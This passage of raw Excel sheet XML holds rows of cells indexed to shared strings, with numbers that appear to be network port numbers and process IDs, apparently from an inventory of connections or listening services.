        <v>0</v>
      </c>
      <c r="G34" t="s">
        <v>810</v>
      </c>
      <c r="H34">
        <v>776</v>
      </c>
      <c r="I34" t="s">
        <v>77</v>
      </c>
      <c r="J34" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="35" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A35" t="s">
        <v>839</v>
      </c>
      <c r="B35" t="s">
        <v>808</v>
      </c>
      <c r="C35" t="s">
        <v>809</v>
      </c>
      <c r="D35">
        <v>135</v>
      </c>
      <c r="E35" t="s">
        <v>809</v>
      </c>
      <c r="F35">
        <v>0</v>
      </c>
      <c r="G35" t="s">
        <v>810</v>
      </c>
      <c r="H35">
        <v>692</v>
      </c>
      <c r="I35" t="s">
        <v>77</v>
      </c>
      <c r="J35" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="36" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A36" t="s">
        <v>840</v>
      </c>
      <c r="B36" t="s">
        <v>808</v>
      </c>
      <c r="C36" t="s">
        <v>809</v>
      </c>
      <c r="D36">
        <v>135</v>
      </c>
      <c r="E36" t="s">
        <v>809</v>
      </c>
      <c r="F36">
        <v>0</v>
      </c>
      <c r="G36" t="s">
        <v>810</v>
      </c>
      <c r="H36">
        <v>692</v>
      </c>
      <c r="I36" t="s">
        <v>77</v>
      </c>
      <c r="J36" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="37" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A37" t="s">
        <v>840</v>
      </c>
      <c r="B37" t="s">
        <v>823</v>
      </c>
      <c r="C37" t="s">
        <v>814</v>
      </c>
      <c r="D37">
        <v>135</v>
      </c>
      <c r="E37" t="s">
        <v>814</v>
      </c>
      <c r="F37">
        <v>0</v>
      </c>
      <c r="G37" t="s">
        <v>810</v>
      </c>
      <c r="H37">
        <v>692</v>
      </c>
      <c r="I37" t="s">
        <v>77</v>
      </c>
      <c r="J37" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="38" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A38" t="s">
        <v>841</v>
      </c>
      <c r="B38" t="s">
        <v>808</v>
      </c>
      <c r="C38" t="s">
        <v>809</v>
      </c>
      <c r="D38">
        <v>49152</v>
      </c>
      <c r="E38" t="s">
        <v>809</v>
      </c>
      <c r="F38">
        <v>0</v>
      </c>
      <c r="G38" t="s">
        <v>810</v>
      </c>
      <c r="H38">
        <v>368</v>
      </c>
      <c r="I38" t="s">
        <v>64</v>
      </c>
      <c r="J38" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="39" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A39" t="s">
        <v>842</v>
      </c>
      <c r="B39" t="s">
        <v>808</v>
      </c>
      <c r="C39" t="s">
        <v>809</v>
      </c>
      <c r="D39">
        <v>49152</v>
      </c>
      <c r="E39" t="s">
        <v>809</v>
      </c>
      <c r="F39">
        <v>0</v>
      </c>
      <c r="G39" t="s">
        <v>810</v>
      </c>
      <c r="H39">
        <v>368</v>
      </c>
      <c r="I39" t="s">
        <v>64</v>
      </c>
      <c r="J39" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="40" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A40" t="s">
        <v>842</v>
      </c>
      <c r="B40" t="s">
        <v>823</v>
      </c>
      <c r="C40" t="s">
        <v>814</v>
      </c>
      <c r="D40">
        <v>49152</v>
      </c>
      <c r="E40" t="s">
        <v>814</v>
      </c>
      <c r="F40">
        <v>0</v>
      </c>
      <c r="G40" t="s">
        <v>810</v>
      </c>
      <c r="H40">
        <v>368</v>
      </c>
      <c r="I40" t="s">
        <v>64</v>
      </c>
      <c r="J40" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="41" spans="1:11" s="3" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>843</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>808</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>830</v>
      </c>
      <c r="D41" s="3">
        <v>3389</v>
      </c>
      <c r="E41" s="3" t="s">
        <v>844</v>
      </c>
      <c r="F41" s="3">
        <v>46338</v>
      </c>
      <c r="G41" s="3" t="s">
        <v>845</v>
      </c>
      <c r="H41" s="3" t="s">
        <v>101</v>
      </c>
      <c r="I41" s="3" t="s">
        <v>101</v>
      </c>
      <c r="J41" s="3" t="s">
        <v>101</v>
      </c>
      <c r="K41" s="3" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="42" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A42" t="s">
        <v>846</v>
      </c>
      <c r="B42" t="s">
        <v>812</v>
      </c>
      <c r="C42" t="s">
        <v>830</v>
      </c>
      <c r="D42">
        <v>137</v>
      </c>
      <c r="E42" t="s">
        <v>154</v>
      </c>
      <c r="F42">
        <v>0</v>
      </c>
      <c r="G42">
        <v>4</v>
      </c>
      <c r="H42" t="s">
        <v>53</v>
      </c>
      <c r="I42" s="1">
        <v>43534</v>
      </c>
      <c r="J42" t="s">
        <v>88</v>
      </c>
      <c r="K42" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="43" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A43" t="s">
        <v>847</v>
      </c>
      <c r="B43" t="s">
        <v>812</v>
      </c>
      <c r="C43" t="s">
        <v>830</v>
      </c>
      <c r="D43">
        <v>138</v>
      </c>
      <c r="E43" t="s">
        <v>154</v>
      </c>
      <c r="F43">
        <v>0</v>
      </c>
      <c r="G43">
        <v>4</v>
      </c>
      <c r="H43" t="s">
        <v>53</v>
      </c>
      <c r="I43" s="1">
        <v>43534</v>
      </c>
      <c r="J43" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="44" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A44" t="s">
        <v>848</v>
      </c>
      <c r="B44" t="s">
        <v>808</v>
      </c>
      <c r="C44" t="s">
        <v>830</v>
      </c>
      <c r="D44">
        <v>139</v>
      </c>
      <c r="E44" t="s">
        <v>809</v>
      </c>
      <c r="F44">
        <v>0</v>
      </c>
      <c r="G44" t="s">
        <v>810</v>
      </c>
      <c r="H44">
        <v>4</v>
      </c>
      <c r="I44" t="s">
        <v>53</v>
      </c>
      <c r="J44" t="s">
        <v>55</v>
      </c>
      <c r="K44" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="45" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A45" t="s">
        <v>849</v>
      </c>
      <c r="B45" t="s">
        <v>804</v>
      </c>
      <c r="C45" t="s">
        <v>805</v>
      </c>
      <c r="D45">
        <v>546</v>
      </c>
      <c r="E45" t="s">
        <v>154</v>
      </c>
      <c r="F45">
        <v>0</v>
      </c>
      <c r="G45">
        <v>776</v>
      </c>
      <c r="H45" t="s">
        <v>77</v>
      </c>
      <c r="I45" s="1">
        <v>43534</v>
      </c>
      <c r="J45" t="s">
        <v>850</v>
      </c>
      <c r="K45" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="46" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A46" t="s">
        <v>851</v>
      </c>
      <c r="B46" t="s">
        <v>812</v>
      </c>
      <c r="C46" t="s">
        <v>809</v>
      </c>
      <c r="D46">
        <v>0</v>
      </c>
      <c r="E46" t="s">
        <v>154</v>
      </c>
      <c r="F46">
        <v>0</v>
      </c>
      <c r="G46">
        <v>2044</v>
      </c>
      <c r="H46" t="s">
        <v>77</v>
      </c>
      <c r="I46" s="1">
        <v>43534</v>
      </c>
      <c r="J46" t="s">
        <v>835</v>
      </c>
      <c r="K46" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="47" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A47" t="s">
        <v>851</v>
      </c>
      <c r="B47" t="s">
        <v>804</v>
      </c>
      <c r="C47" t="s">
        <v>814</v>
      </c>
      <c r="D47">
        <v>0</v>
      </c>
      <c r="E47" t="s">
        <v>154</v>
      </c>
      <c r="F47">
        <v>0</v>
      </c>
      <c r="G47">
        <v>2044</v>
      </c>
      <c r="H47" t="s">
        <v>77</v>
      </c>
      <c r="I47" s="1">
        <v>43534</v>
      </c>
      <c r="J47" t="s">
        <v>835</v>
      </c>
      <c r="K47" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="48" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A48" t="s">
        <v>852</v>
      </c>
      <c r="B48" t="s">
        <v>812</v>
      </c>
      <c r="C48" t="s">
        <v>809</v>
      </c>
      <c r="D48">
        <v>0</v>
      </c>
      <c r="E48" t="s">
        <v>154</v>
      </c>
      <c r="F48">
        <v>0</v>
      </c>
      <c r="G48">
        <v>2044</v>
      </c>
      <c r="H48" t="s">
        <v>77</v>
      </c>
      <c r="I48" s="1">
        <v>43534</v>
      </c>
      <c r="J48" t="s">
        <v>835</v>
      </c>
      <c r="K48" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="49" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A49" t="s">
        <v>853</v>
      </c>
      <c r="B49" t="s">
        <v>812</v>
      </c>
      <c r="C49" t="s">
        <v>809</v>
      </c>
      <c r="D49">
        <v>3702</v>
      </c>
      <c r="E49" t="s">
        <v>154</v>
      </c>
      <c r="F49">
        <v>0</v>
      </c>
      <c r="G49">
        <v>1444</v>
      </c>
      <c r="H49" t="s">
        <v>77</v>
      </c>
      <c r="I49" s="1">
        <v>43534</v>
      </c>
      <c r="J49" t="s">
        <v>835</v>
      </c>
      <c r="K49" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="50" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A50" t="s">
        <v>854</v>
      </c>
      <c r="B50" t="s">
        <v>812</v>
      </c>
      <c r="C50" t="s">
        <v>809</v>
      </c>
      <c r="D50">
        <v>3702</v>
      </c>
      <c r="E50" t="s">
        <v>154</v>
      </c>
      <c r="F50">
        <v>0</v>
      </c>
      <c r="G50">
        <v>1444</v>
      </c>
      <c r="H50" t="s">
        <v>77</v>
      </c>
      <c r="I50" s="1">
        <v>43534</v>
      </c>
      <c r="J50" t="s">
        <v>835</v>
      </c>
      <c r="K50" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="51" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A51" t="s">
        <v>854</v>
      </c>
      <c r="B51" t="s">
        <v>804</v>
      </c>
      <c r="C51" t="s">
        <v>814</v>
      </c>
      <c r="D51">
        <v>3702</v>
      </c>
      <c r="E51" t="s">
        <v>154</v>
      </c>
      <c r="F51">
        <v>0</v>
      </c>
      <c r="G51">
        <v>1444</v>
      </c>
      <c r="H51" t="s">
        <v>77</v>
      </c>
      <c r="I51" s="1">
        <v>43534</v>
      </c>
      <c r="J51" t="s">
        <v>835</v>
      </c>
    </row>
    <row r="52" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A52" t="s">
        <v>855</v>
      </c>
      <c r="B52" t="s">
        <v>808</v>
      </c>
      <c r="C52" t="s">
        <v>809</v>
      </c>
      <c r="D52">
        <v>49153</v>
      </c>
      <c r="E52" t="s">
        <v>809</v>
      </c>
      <c r="F52">
        <v>0</v>
      </c>
      <c r="G52" t="s">
        <v>810</v>
      </c>
      <c r="H52">
        <v>776</v>
      </c>
      <c r="I52" t="s">
        <v>77</v>
      </c>
      <c r="J52" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="53" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A53" t="s">
        <v>855</v>
      </c>
      <c r="B53" t="s">
        <v>823</v>
      </c>
      <c r="C53" t="s">
        <v>814</v>
      </c>
      <c r="D53">
        <v>49153</v>
      </c>
      <c r="E53" t="s">
        <v>814</v>
      </c>
      <c r="F53">
        <v>0</v>
      </c>
      <c r="G53" t="s">
        <v>810</v>
      </c>
      <c r="H53">
        <v>776</v>
      </c>
      <c r="I53" t="s">
        <v>77</v>
      </c>
      <c r="J53" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="54" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A54" t="s">
        <v>856</v>
      </c>
      <c r="B54" t="s">
        <v>808</v>
      </c>
      <c r="C54" t="s">
        <v>809</v>
      </c>
      <c r="D54">
        <v>3389</v>
      </c>
      <c r="E54" t="s">
        <v>809</v>
      </c>
      <c r="F54">
        <v>0</v>
      </c>
      <c r="G54" t="s">
        <v>810</v>
      </c>
      <c r="H54">
        <v>1176</v>
      </c>
      <c r="I54" t="s">
        <v>77</v>
      </c>
      <c r="J54" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="55" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A55" t="s">
        <v>856</v>
      </c>
      <c r="B55" t="s">
        <v>823</v>
      </c>
      <c r="C55" t="s">
        <v>814</v>
      </c>
      <c r="D55">
        <v>3389</v>
      </c>
      <c r="E55" t="s">
        <v>814</v>
      </c>
      <c r="F55">
        <v>0</v>
      </c>
      <c r="G55" t="s">
        <v>810</v>
      </c>
      <c r="H55">
        <v>1176</v>
      </c>
      <c r="I55" t="s">
        <v>77</v>
      </c>
      <c r="J55" t="s">
        <v>55</v>
      </c>
      <c r="K55" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="56" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A56" t="s">
        <v>857</v>
      </c>
      <c r="B56" t="s">
        <v>812</v>
      </c>
      <c r="C56" t="s">
        <v>809</v>
      </c>
      <c r="D56">
        <v>5355</v>
      </c>
      <c r="E56" t="s">
        <v>154</v>
      </c>
      <c r="F56">
        <v>0</v>
      </c>
      <c r="G56">
        <v>1176</v>
      </c>
      <c r="H56" t="s">
        <v>77</v>
      </c>
      <c r="I56" s="1">
        <v>43534</v>
      </c>
      <c r="J56" t="s">
        <v>110</v>
      </c>
      <c r="K56" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="57" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A57" t="s">
        <v>857</v>
      </c>
      <c r="B57" t="s">
        <v>804</v>
      </c>
      <c r="C57" t="s">
        <v>814</v>
      </c>
      <c r="D57">
        <v>5355</v>
      </c>
      <c r="E57" t="s">
        <v>154</v>
      </c>
      <c r="F57">
        <v>0</v>
      </c>
      <c r="G57">
        <v>1176</v>
      </c>
      <c r="H57" t="s">
        <v>77</v>
      </c>
      <c r="I57" s="1">
        <v>43534</v>
      </c>
      <c r="J57" t="s">
        <v>110</v>
      </c>
      <c r="K57" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="58" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A58" t="s">
        <v>858</v>
      </c>
      <c r="B58" t="s">
        <v>812</v>
      </c>
      <c r="C58" t="s">
        <v>809</v>
      </c>
      <c r="D58">
        <v>0</v>
      </c>
      <c r="E58" t="s">
        <v>154</v>
      </c>
      <c r="F58">
        <v>0</v>
      </c>
      <c r="G58">
        <v>1176</v>
      </c>
      <c r="H58" t="s">
        <v>77</v>
      </c>
      <c r="I58" s="1">
        <v>43534</v>
      </c>
      <c r="J58" t="s">
        <v>88</v>
      </c>
      <c r="K58" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="59" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A59" t="s">
        <v>858</v>
      </c>
      <c r="B59" t="s">
        <v>804</v>
      </c>
      <c r="C59" t="s">
        <v>814</v>
      </c>
      <c r="D59">
        <v>0</v>
      </c>
      <c r="E59" t="s">
        <v>154</v>
      </c>
      <c r="F59">
        <v>0</v>
      </c>
      <c r="G59">
        <v>1176</v>
      </c>
      <c r="H59" t="s">
        <v>77</v>
      </c>
      <c r="I59" s="1">
        <v>43534</v>
      </c>
      <c r="J59" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="60" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A60" t="s">
        <v>859</v>
      </c>
      <c r="B60" t="s">
        <v>808</v>
      </c>
      <c r="C60" t="s">
        <v>809</v>
      </c>
      <c r="D60">
        <v>49154</v>
      </c>
      <c r="E60" t="s">
        <v>809</v>
      </c>
      <c r="F60">
        <v>0</v>
      </c>
      <c r="G60" t="s">
        <v>810</v>
      </c>
      <c r="H60">
        <v>912</v>
      </c>
      <c r="I60" t="s">
        <v>77</v>
      </c>
      <c r="J60" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="61" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A61" t="s">
        <v>860</v>
      </c>
      <c r="B61" t="s">
        <v>808</v>
      </c>
      <c r="C61" t="s">
        <v>809</v>
      </c>
      <c r="D61">
        <v>49154</v>
      </c>
      <c r="E61" t="s">
        <v>809</v>
      </c>
      <c r="F61">
        <v>0</v>
      </c>
      <c r="G61" t="s">
        <v>810</v>
      </c>
      <c r="H61">
        <v>912</v>
      </c>
      <c r="I61" t="s">
        <v>77</v>
      </c>
      <c r="J61" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="62" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A62" t="s">
        <v>860</v>
      </c>
      <c r="B62" t="s">
        <v>823</v>
      </c>
      <c r="C62" t="s">
        <v>814</v>
      </c>
      <c r="D62">
        <v>49154</v>
      </c>
      <c r="E62" t="s">
        <v>814</v>
      </c>
      <c r="F62">
        <v>0</v>
      </c>
      <c r="G62" t="s">
        <v>810</v>
      </c>
      <c r="H62">
        <v>912</v>
      </c>
      <c r="I62" t="s">
        <v>77</v>
      </c>
      <c r="J62" t="s">
        <v>55</v>
      </c>
      <c r="K62" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="63" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A63" t="s">
        <v>861</v>
      </c>
      <c r="B63" t="s">
        <v>812</v>
      </c>
      <c r="C63" t="s">
        <v>809</v>
      </c>
      <c r="D63">
        <v>5355</v>
      </c>
      <c r="E63" t="s">
        <v>154</v>
      </c>
      <c r="F63">
        <v>0</v>
      </c>
      <c r="G63">
        <v>1176</v>
      </c>
      <c r="H63" t="s">
        <v>77</v>
      </c>
      <c r="I63" s="1">
        <v>43534</v>
      </c>
      <c r="J63" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="64" spans="1:11" s="3" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A64" s="3" t="s">
        <v>862</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>808</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>830</v>
      </c>
      <c r="D64" s="3">
        <v>62558</v>
      </c>
      <c r="E64" s="3" t="s">
        <v>844</v>
      </c>
      <c r="F64" s="3">
        <v>80</v>
      </c>
      <c r="G64" s="3" t="s">
        <v>845</v>
      </c>
      <c r="H64" s="3" t="s">
        <v>101</v>
      </c>
      <c r="I64" s="3" t="s">
        <v>101</v>
      </c>
      <c r="J64" s="3" t="s">
        <v>101</v>
      </c>
      <c r="K64" s="3" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="65" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A65" t="s">
        <v>863</v>
      </c>
      <c r="B65" t="s">
        <v>812</v>
      </c>
      <c r="C65" t="s">
        <v>809</v>
      </c>
      <c r="D65">
        <v>0</v>
      </c>
      <c r="E65" t="s">
        <v>154</v>
      </c>
      <c r="F65">
        <v>0</v>
      </c>
      <c r="G65">
        <v>3672</v>
      </c>
      <c r="H65" t="s">
        <v>126</v>
      </c>
      <c r="I65" s="1">
        <v>43534</v>
      </c>
      <c r="J65" t="s">
        <v>864</v>
      </c>
      <c r="K65" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="66" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A66" t="s">
        <v>865</v>
      </c>
      <c r="B66" t="s">
        <v>812</v>
      </c>
      <c r="C66" t="s">
        <v>809</v>
      </c>
      <c r="D66">
        <v>0</v>
      </c>
      <c r="E66" t="s">
        <v>154</v>
      </c>
      <c r="F66">
        <v>0</v>
      </c>
      <c r="G66">
        <v>3672</v>
      </c>
      <c r="H66" t="s">
        <v>126</v>
      </c>
      <c r="I66" s="1">
        <v>43534</v>
      </c>
      <c r="J66" t="s">
        <v>864</v>
      </c>
      <c r="K66" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="67" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A67" t="s">
        <v>865</v>
      </c>
      <c r="B67" t="s">
        <v>804</v>
      </c>
      <c r="C67" t="s">
        <v>814</v>
      </c>
      <c r="D67">
        <v>0</v>
      </c>
      <c r="E67" t="s">
        <v>154</v>
      </c>
      <c r="F67">
        <v>0</v>
      </c>
      <c r="G67">
        <v>3672</v>
      </c>
      <c r="H67" t="s">
        <v>126</v>
      </c>
      <c r="I67" s="1">
        <v>43534</v>
      </c>
      <c r="J67" t="s">
        <v>864</v>
      </c>
      <c r="K67" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="68" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A68" t="s">
        <v>866</v>
      </c>
      <c r="B68" t="s">
        <v>812</v>
      </c>
      <c r="C68" t="s">
        <v>809</v>
      </c>
      <c r="D68">
        <v>0</v>
      </c>
      <c r="E68" t="s">
        <v>154</v>
      </c>
      <c r="F68">
        <v>0</v>
      </c>
      <c r="G68">
        <v>3672</v>
      </c>
      <c r="H68" t="s">
        <v>126</v>
      </c>
      <c r="I68" s="1">
        <v>43534</v>
      </c>
      <c r="J68" t="s">
        <v>864</v>
      </c>
      <c r="K68" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="69" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A69" t="s">
        <v>866</v>
      </c>
      <c r="B69" t="s">
        <v>804</v>
      </c>
      <c r="C69" t="s">
        <v>814</v>
      </c>
      <c r="D69">
        <v>0</v>
      </c>
      <c r="E69" t="s">
        <v>154</v>
      </c>
      <c r="F69">
        <v>0</v>
      </c>
      <c r="G69">
        <v>3672</v>
      </c>
      <c r="H69" t="s">
        <v>126</v>
      </c>
      <c r="I69" s="1">
        <v>43534</v>
      </c>
      <c r="J69" t="s">
        <v>864</v>
      </c>
      <c r="K69" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="70" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A70" t="s">
        <v>867</v>
      </c>
      <c r="B70" t="s">
        <v>812</v>
      </c>
      <c r="C70" t="s">
        <v>809</v>
      </c>
      <c r="D70">
        <v>0</v>
      </c>
      <c r="E70" t="s">
        <v>154</v>
      </c>
      <c r="F70">
        <v>0</v>
      </c>
      <c r="G70">
        <v>3672</v>
      </c>
      <c r="H70" t="s">
        <v>126</v>
      </c>
      <c r="I70" s="1">
        <v>43534</v>
      </c>
      <c r="J70" t="s">
        <v>864</v>
      </c>
      <c r="K70" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="71" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A71" t="s">
        <v>868</v>
      </c>
      <c r="B71" t="s">
        <v>812</v>
      </c>
      <c r="C71" t="s">
        <v>809</v>
      </c>
      <c r="D71">
        <v>3702</v>
      </c>
      <c r="E71" t="s">
        <v>154</v>
      </c>
      <c r="F71">
        <v>0</v>
      </c>
      <c r="G71">
        <v>876</v>
      </c>
      <c r="H71" t="s">
        <v>77</v>
      </c>
      <c r="I71" s="1">
        <v>43534</v>
      </c>
      <c r="J71" t="s">
        <v>813</v>
      </c>
      <c r="K71" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="72" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A72" t="s">
        <v>868</v>
      </c>
      <c r="B72" t="s">
        <v>804</v>
      </c>
      <c r="C72" t="s">
        <v>814</v>
      </c>
      <c r="D72">
        <v>3702</v>
      </c>
      <c r="E72" t="s">
        <v>154</v>
      </c>
      <c r="F72">
        <v>0</v>
      </c>
      <c r="G72">
        <v>876</v>
      </c>
      <c r="H72" t="s">
        <v>77</v>
      </c>
      <c r="I72" s="1">
        <v>43534</v>
      </c>
      <c r="J72" t="s">
        <v>813</v>
      </c>
      <c r="K72" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="73" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A73" t="s">
        <v>869</v>
      </c>
      <c r="B73" t="s">
        <v>812</v>
      </c>
      <c r="C73" t="s">
        <v>809</v>
      </c>
      <c r="D73">
        <v>56207</v>
      </c>
      <c r="E73" t="s">
        <v>154</v>
      </c>
      <c r="F73">
        <v>0</v>
      </c>
      <c r="G73">
        <v>876</v>
      </c>
      <c r="H73" t="s">
        <v>77</v>
      </c>
      <c r="I73" s="1">
        <v>43534</v>
      </c>
      <c r="J73" t="s">
        <v>813</v>
      </c>
    </row>
    <row r="74" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A74" t="s">
        <v>870</v>
      </c>
      <c r="B74" t="s">
        <v>808</v>
      </c>
      <c r="C74" t="s">
        <v>809</v>
      </c>
      <c r="D74">
        <v>2869</v>
      </c>
      <c r="E74" t="s">
        <v>809</v>
      </c>
      <c r="F74">
        <v>0</v>
      </c>
      <c r="G74" t="s">
        <v>810</v>
      </c>
      <c r="H74">
        <v>4</v>
      </c>
      <c r="I74" t="s">
        <v>53</v>
      </c>
      <c r="J74" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="75" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A75" t="s">
        <v>870</v>
      </c>
      <c r="B75" t="s">
        <v>823</v>
      </c>
      <c r="C75" t="s">
        <v>814</v>
      </c>
      <c r="D75">
        <v>2869</v>
      </c>
      <c r="E75" t="s">
        <v>814</v>
      </c>
      <c r="F75">
        <v>0</v>
      </c>
      <c r="G75" t="s">
        <v>810</v>
      </c>
      <c r="H75">
        <v>4</v>
      </c>
      <c r="I75" t="s">
        <v>53</v>
      </c>
      <c r="J75" t="s">
        <v>55</v>
      </c>
      <c r="K75" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="76" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A76" t="s">
        <v>871</v>
      </c>
      <c r="B76" t="s">
        <v>812</v>
      </c>
      <c r="C76" t="s">
        <v>809</v>
      </c>
      <c r="D76">
        <v>0</v>
      </c>
      <c r="E76" t="s">
        <v>154</v>
      </c>
      <c r="F76">
        <v>0</v>
      </c>
      <c r="G76">
        <v>912</v>
      </c>
      <c r="H76" t="s">
        <v>77</v>
      </c>
      <c r="I76" s="1">
        <v>43534</v>
      </c>
      <c r="J76" t="s">
        <v>872</v>
      </c>
      <c r="K76" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="77" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A77" t="s">
        <v>871</v>
      </c>
      <c r="B77" t="s">
        <v>804</v>
      </c>
      <c r="C77" t="s">
        <v>814</v>
      </c>
      <c r="D77">
        <v>0</v>
      </c>
      <c r="E77" t="s">
        <v>154</v>
      </c>
      <c r="F77">
        <v>0</v>
      </c>
      <c r="G77">
        <v>912</v>
      </c>
      <c r="H77" t="s">
        <v>77</v>
      </c>
      <c r="I77" s="1">
        <v>43534</v>
      </c>
      <c r="J77" t="s">
        <v>872</v>
      </c>
      <c r="K77" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="78" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A78" t="s">
        <v>873</v>
      </c>
      <c r="B78" t="s">
        <v>812</v>
      </c>
      <c r="C78" t="s">
        <v>809</v>
      </c>
      <c r="D78">
        <v>0</v>
      </c>
      <c r="E78" t="s">
        <v>154</v>
      </c>
      <c r="F78">
        <v>0</v>
      </c>
      <c r="G78">
        <v>640</v>
      </c>
      <c r="H78" t="s">
        <v>80</v>
      </c>
      <c r="I78" s="1">
        <v>43534</v>
      </c>
      <c r="J78" t="s">
        <v>874</v>
      </c>
      <c r="K78" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="79" spans="1:11" x14ac:dyDescent="0.25">
      <c r="A79" t="s">
        <v>875</v>
      </c>
      <c r="B79" t="s">
        <v>812</v>
      </c>
      <c r="C79" t="s">
        <v>876</v>
      </c>
      <c r="D79">
        <v>56206</v>
      </c>
      <c r="E79" t="s">
        <v>154</v>
      </c>
      <c r="F79">
        <v>0</v>
      </c>
      <c r="G79">
        <v>1444</v>
      </c>
      <c r="H79" t="s">
        <v>77</v>
      </c>
      <c r="I79" s="1">
        <v>43534</v>
      </c>
      <c r="J79" t="s">
        <v>813</v>
      </c>
    </row>
    <row r="80" spans="1:11" s="3" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A80" s="3" t="s">
        <v>877</v>
      </c>
      <c r="B80" s="3" t="s">
        <v>808</v>
      </c>
      <c r="C80" s="3" t="s">
        <v>830</v>
      </c>
      <c r="D80" s="3">
        <v>49185</v>
      </c>
      <c r="E80" s="3" t="s">
        <v>878</v>
      </c>
      <c r="F80" s="3">
        <v>443</v>
      </c>
      <c r="G80" s="3" t="s">
        <v>845</v>
      </c>
      <c r="H80" s="3" t="s">
        <v>101</v>
      </c>
      <c r="I80" s="3" t="s">
        <v>101</v>
      </c>
      <c r="J80" s="3" t="s">
        <v>101</v>
      </c>
      <c r="K80" s="3" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="81" spans="1:11" hidden="1" x14ac:dyDescent="0.25">
      <c r="A81" t="s">
        <v>879</v>
      </c>
      <c r="B81" t="s">
        <v>804</v>
      </c>
      <c r="C81" t="s">
        <v>818</v>
      </c>
      <c r="D81">
        <v>56204</v>
      </c>
      <c r="E81" t="s">
        <v>154</v>
      </c>
      <c r="F81">
        <v>0</v>
      </c>
      <c r="G81">
        <v>1444</v>
      </c>
      <c r="H81" t="s">
        <v>77</v>
      </c>
      <c r="I81" s="1">
        <v>43534</v>
      </c>
      <c r="J81" t="s">
        <v>813</v>
      </c>
